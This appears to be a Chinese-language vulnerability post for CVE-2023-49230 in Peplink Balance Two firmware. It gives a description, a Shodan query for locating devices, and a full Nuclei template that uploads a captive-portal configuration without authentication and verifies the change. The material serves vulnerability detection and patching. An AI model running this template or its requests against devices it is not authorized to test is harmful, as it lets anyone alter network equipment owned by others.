Peplink Balance Two 未授权配置上传漏洞

漏洞信息

漏洞名称: Peplink Balance Two 未授权配置上传漏洞

漏洞编号:

  • CVE: CVE-2023-49230

漏洞类型: 未授权访问

漏洞等级: 高危

漏洞描述: Peplink Balance Two是一款企业级负载均衡和故障转移设备,广泛应用于需要高可用性和网络冗余的企业环境中。该设备通过优化多个互联网连接的使用,确保业务的连续性和网络的稳定性。此次发现的漏洞影响版本8.4.0之前的固件。

漏洞的具体表现为未授权访问问题,由于缺少适当的授权检查,攻击者可以无需认证即可通过/guest/portal_admin_upload.cgi路径上传文件,修改设备的captive portal配置。这种漏洞的技术根源在于对用户输入的处理不当,未能验证上传请求的合法性,从而允许攻击者绕过正常的认证流程。

此漏洞的安全风险较高,攻击者可以利用此漏洞远程修改设备的配置,可能导致服务中断、数据泄露或其他恶意操作。由于漏洞利用无需认证,且可以通过网络远程触发,因此攻击门槛较低,易于自动化攻击。企业用户应立即升级到8.4.0或更高版本的固件,以避免潜在的安全威胁。

产品厂商: peplink

产品名称: balance_two_firmware

影响版本: version < 8.4.0

搜索语法: html:”PEPLINK”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/6ed1f2bdb29fe3b8b30d4d99a5bd65a20a80d315/http%2Fcves%2F2023%2FCVE-2023-49230.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97

id: CVE-2023-49230

info:
  name: Peplink Balance Two before 8.4.0 - Unauthenticated Config Upload
  author: srilakivarma
  severity: high
  description: |
    A vulnerability in Peplink Balance Two prior to version 8.4.0 allows unauthenticated attackers to modify captive portal configurations due to a missing authorization check. Specifically, attackers can upload files via /guest/portal_admin_upload.cgi, with the changes reflected at /guest/preview.cgi?portal_id=1.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-49230
    - https://www.synacktiv.com/publications%253Ffield_tags_target_id%253D4
    - https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-49230
    cwe-id: CWE-862
    epss-score: 0.00091
    epss-percentile: 0.27
    cpe: cpe:2.3:o:peplink:balance_two_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: peplink
    product: balance_two_firmware
    shodan-query: html:"PEPLINK"
  tags: cve,cve2023,peplink,unauth,intrusive,file-upload

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/MANGA/index.cgi"

    matchers:
      - type: word
        part: body
        words:
          - 'init_company_name = "Peplink"'
        internal: true

  - raw:
    - |
      POST /guest/portal_admin_upload.cgi HTTP/1.1
      Host: {{Hostname}}
      Content-Type: multipart/form-data; boundary=---------------------------370611892836891531633729116268

      -----------------------------370611892836891531633729116268
      Content-Disposition: form-data; name="option"

      edit_page
      -----------------------------370611892836891531633729116268
      Content-Disposition: form-data; name="mode"

      submit
      -----------------------------370611892836891531633729116268
      Content-Disposition: form-data; name="portal_id"

      1
      -----------------------------370611892836891531633729116268
      Content-Disposition: form-data; name="data"

      {"status":"ok","config":{"login":{"access_mode":"open","message":"","tnc_content":"Terms and Conditions.","tnc_title":"Terms and Conditions","tnc_link":"terms","tnc_prompt":"I agree to #TNC_LINK#","back_login_button":"Back to Login","agree_button":"{{randstr}}","session_id1":" ","session_id2":" "},"common":{"hide_quota":"no","landing_url":"","logo_url":"logo.cgi?portal_id=1&type=preview","logo_url_def":"logo.cgi?default=1","uploaded_logo_size":0,"footer":"Powered by Peplink.","footer_default":"Powered by Peplink."},"success":{},"reach_quota":{},"quota":{"limit":{"data":0,"session_timeout":1800}}}}
      -----------------------------370611892836891531633729116268
      Content-Disposition: form-data; name="logo_action"

      x
      -----------------------------370611892836891531633729116268
      Content-Disposition: form-data; name="logo"; filename=""
      Content-Type: application/octet-stream

      -----------------------------370611892836891531633729116268--

    matchers:
      - type: word
        part: body
        words:
          - '"status": "save_success"'
        internal: true

  - raw:
      - |
        POST /guest/api.cgi HTTP/1.1
        Host: {{Hostname}}

        mode=info&option=preview&portal_id=1

    matchers:
      - type: dsl
        dsl:
          - "contains(body, '{{randstr}}')"
          - 'status_code_2 == 200'
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #未授权访问
Peplink Balance Two 未授权配置上传漏洞
http://example.com/2025/07/09/github_3330909523/
作者
lianccc
发布于
2025年7月9日
许可协议